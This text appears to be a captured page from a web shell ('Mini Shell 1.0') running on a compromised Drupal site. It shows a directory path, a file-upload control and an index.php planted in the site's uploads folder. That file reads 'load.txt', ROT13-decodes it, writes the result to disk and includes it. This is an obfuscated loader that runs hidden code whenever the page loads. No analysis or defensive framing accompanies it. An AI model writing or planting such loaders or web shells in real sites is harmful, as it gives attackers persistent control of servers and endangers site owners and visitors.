HOME


Mini Shell 1.0
DIR: /home/depancom/www/drupal/sites/default/files/302170/817643/
Upload File :
Current File : /home/depancom/www/drupal/sites/default/files/302170/817643/index.php
<?php
$kk = file_get_contents("load.txt");
$kk = str_rot13($kk);
file_put_contents('load', $kk);
include "load";